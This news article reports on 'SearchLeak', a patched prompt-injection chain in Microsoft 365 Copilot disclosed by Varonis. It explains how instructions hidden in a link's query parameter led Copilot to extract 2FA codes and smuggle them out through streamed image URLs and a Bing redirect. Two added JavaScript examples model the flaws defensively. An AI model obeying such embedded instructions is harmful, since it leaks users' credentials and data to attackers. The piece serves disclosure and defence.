Microsoft Copilot flaw let hackers steal 2FA codes in one click

Huma Shazia · 16 June 2026 at 6:21 pm · 5 min read
Key Takeaways

Source: Ars Technica
  • Security researchers at Varonis discovered a critical flaw in Microsoft 365 Copilot that could steal 2FA codes and sensitive data from enterprise emails
  • The attack required only one click on a malicious link, with no additional user input needed
  • Microsoft patched the vulnerability on June 10, but the exploit highlights fundamental security challenges in enterprise AI systems

A critical Microsoft 365 Copilot vulnerability allowed attackers to steal two-factor authentication codes, password reset links, and other sensitive data from enterprise emails. The victim had to do nothing more than click a single link. Varonis, the security firm that discovered the flaw, publicly disclosed the exploit chain on Monday after Microsoft patched it last Tuesday.

The attack, dubbed SearchLeak, chained together three separate flaws to bypass Microsoft's security guardrails. It exploited a fundamental weakness that plagues all large language models: they cannot reliably distinguish between instructions from the user and malicious commands embedded in content they process.

How did the SearchLeak exploit work?

Varonis researchers built an attack that required zero typing from the victim. An attacker sends an email containing a specially crafted URL pointing to Microsoft's own search functionality. When the target clicks the link, Copilot executes instructions hidden in the URL's query parameter.

Those instructions tell Copilot to search the user's emails, extract sensitive content like 2FA codes, and embed it in an image URL. Normally, Microsoft's guardrails would wrap Copilot's output in code blocks to prevent the browser from executing it. But the researchers found a timing flaw.

The protection only kicks in after Copilot finishes its "thinking" phase. During generation, Copilot streams raw HTML that the browser temporarily renders. By the time the guardrail wraps everything safely, the browser has already fired off an HTTP request containing the stolen data.
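The ordering problem described above can be reproduced in a toy model. The following is an added example, not code from Varonis or Microsoft: the "browser" is a regex that fetches any complete image tag it is shown, and the chunks, the host `untrusted.example` and the function names are all constructed for illustration.

```javascript
// Added example: a simplified model, not Copilot's actual rendering code.
// Constructed model output split into stream chunks; the tag spans chunk boundaries.
const CHUNKS = [
  'Summary ready. <im',
  'g src="https://untrusted.example/pixel?d=',
  'PLACEHOLDER">',
  ' Done.',
];

// Escape the HTML-significant characters so text can never become markup.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return text.replace(/[&<>"']/g, (c) => map[c]);
}

// Toy browser: each frame is parsed as HTML, and any complete <img src="...">
// in a frame causes a fetch. Returns the distinct URLs that were requested.
function fetchedImageUrls(frames) {
  const urls = new Set();
  for (const frame of frames) {
    for (const m of frame.matchAll(/<img\b[^>]*\bsrc\s*=\s*"([^"]*)"[^>]*>/gi)) {
      urls.add(m[1]);
    }
  }
  return [...urls];
}

// Guardrail applied only when generation finishes: intermediate frames are raw.
function framesWithLateGuardrail(chunks) {
  const frames = [];
  let buffer = '';
  for (const chunk of chunks) {
    buffer += chunk;
    frames.push(buffer); // raw HTML reaches the renderer mid-stream
  }
  frames.push('<pre><code>' + escapeHtml(buffer) + '</code></pre>');
  return frames;
}

// Guardrail applied to every chunk before anything reaches the renderer.
function framesWithStreamingGuardrail(chunks) {
  const frames = [];
  let safe = '';
  for (const chunk of chunks) {
    safe += escapeHtml(chunk); // per-character escaping is chunk-boundary safe
    frames.push('<pre><code>' + safe + '</code></pre>');
  }
  return frames;
}
```

With the late guardrail the toy browser has already requested the image by the third frame, even though the final frame is safely wrapped; with per-chunk escaping no frame ever contains live markup.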

The vulnerability demonstrates that simply 'grounding' LLMs in enterprise data isn't enough; we need new primitives to distinguish between user intent and data-borne instructions.

— Security Researcher, Varonis Threat Labs

Why couldn't Microsoft's existing protections stop it?

Microsoft built multiple guardrails into Copilot. It restricts which external sites the AI can contact. It wraps output in code blocks to prevent HTML execution. It blocks the AI from sending emails or submitting forms. SearchLeak bypassed all of them.

The final obstacle was Copilot's content security policy, which blocks requests to untrusted domains. Varonis used Microsoft's own Bing search engine as a trampoline. Bing is on Copilot's whitelist. The exploit crafted an image request to Bing's reverse image search, which then redirected to the attacker's server. The stolen data rode along in the URL.
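A host allowlist only evaluates the first hop, so an allowlisted service that forwards to a URL supplied in its query string effectively extends the allowlist. The following added example (not from the original article or from Microsoft) audits a request log for that pattern; the hostnames, the parameter names `imgurl` and `u`, and the log entries are constructed placeholders, not Bing's real endpoints.

```javascript
// Added example with constructed data; hostnames and parameters are placeholders.
const ALLOWLIST = new Set(['search.allowed.example', 'cdn.allowed.example']);

// Constructed log of requests issued by the AI rendering surface.
const SAMPLE_REQUESTS = [
  'https://cdn.allowed.example/logo.png',
  'https://search.allowed.example/images?imgurl=https%3A%2F%2Funtrusted.example%2Fp%3Fd%3DPLACEHOLDER',
  'https://search.allowed.example/images?q=quarterly+report',
  'https://search.allowed.example/r?u=https://cdn.allowed.example/a.png',
];

// Return every absolute http(s) URL carried as a query-parameter value.
function nestedUrls(url) {
  const found = [];
  for (const value of url.searchParams.values()) { // values arrive percent-decoded
    try {
      const inner = new URL(value);
      if (inner.protocol === 'http:' || inner.protocol === 'https:') found.push(inner);
    } catch {
      // value is not an absolute URL; ignore it
    }
  }
  return found;
}

// Flag requests that pass the host allowlist yet carry a nested URL whose
// host is outside it: a possible redirect or fetch-by-proxy hop.
function findTrampolineCandidates(requests, allowlist) {
  const findings = [];
  for (const raw of requests) {
    const outer = new URL(raw);
    if (!allowlist.has(outer.hostname)) continue; // the allowlist already blocks these
    for (const inner of nestedUrls(outer)) {
      if (!allowlist.has(inner.hostname)) {
        findings.push({ request: raw, via: outer.hostname, nestedHost: inner.hostname });
      }
    }
  }
  return findings;
}
```

A hit is a lead for review rather than proof of abuse, since whether the allowlisted service actually follows or redirects to the nested URL has to be confirmed separately.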

1 click
The only user interaction required to exfiltrate sensitive data from enterprise Microsoft 365 accounts

What data was at risk?

Because SearchLeak targeted Microsoft 365's Enterprise tier, the blast radius extended far beyond personal email. Researchers confirmed the exploit could surface:

  • Two-factor authentication codes sent via email
  • Password reset links
  • Meeting invites and notes
  • SharePoint documents and OneDrive files
  • Any other content indexed by Microsoft 365

For organizations with deep Microsoft 365 integrations, the exposure could extend even wider. Anything the compromised user account could access, Copilot could exfiltrate.

The unsolved problem behind every LLM exploit

SearchLeak is not an isolated bug. It stems from what security researchers call prompt injection, a class of attack that has no known universal fix. LLMs process instructions and data in the same channel. When an attacker hides malicious instructions inside data the model is summarizing or responding to, the model often complies.

Microsoft and other LLM providers have resorted to layered guardrails: output filtering, domain restrictions, behavioral rules. But these are patches, not solutions. Each guardrail creates new attack surface. Researchers keep finding ways to chain bypasses together, as Varonis did with SearchLeak.

Community discussion on Hacker News and Reddit has focused on this architectural tension. Enterprise AI adoption is accelerating, but the security controls lag behind. Giving LLMs read and write access to sensitive data like MFA codes assumes input sanitization that does not exist yet.

Is Microsoft 365 Copilot safe to use now?

Microsoft patched the specific vulnerabilities SearchLeak exploited on June 10. Organizations running the latest version are protected against this particular attack chain. But the underlying prompt injection problem remains open.

Enterprises using Copilot should audit what data the AI can access. Limiting Copilot's reach to non-sensitive content reduces the blast radius of future exploits. Security teams should also monitor for unusual Copilot activity patterns that might indicate probing attempts.

Frequently Asked Questions

What was the Microsoft Copilot vulnerability?

A critical flaw that allowed attackers to steal 2FA codes, password reset links, and other sensitive data from enterprise Microsoft 365 accounts. The victim only needed to click one malicious link.

Has Microsoft fixed the Copilot security flaw?

Yes. Microsoft patched the specific vulnerabilities on June 10, 2026. Organizations running updated versions are protected against this exploit chain.

What is prompt injection in LLMs?

A class of attack where malicious instructions are hidden inside content an AI model processes. The model cannot distinguish these from legitimate user commands and often executes them.

Who discovered the SearchLeak vulnerability?

Security researchers at Varonis Threat Labs discovered and reported the vulnerability to Microsoft before publicly disclosing the details.

What enterprise data was at risk from SearchLeak?

Emails, 2FA codes, password reset links, meeting invites, SharePoint documents, OneDrive files, and any other content indexed by Microsoft 365 that the compromised user could access.

Logicity's Take

SearchLeak is a preview of the security challenges that come with enterprise AI adoption. Companies rushing to deploy Copilot and similar tools are betting that guardrails can contain an attack surface that researchers keep widening. Until LLM providers solve the fundamental prompt injection problem, not with filters but with architectural changes, every enterprise AI deployment is a calculated risk. The question is whether your organization is calculating correctly.


Huma Shazia

Senior AI & Tech Writer
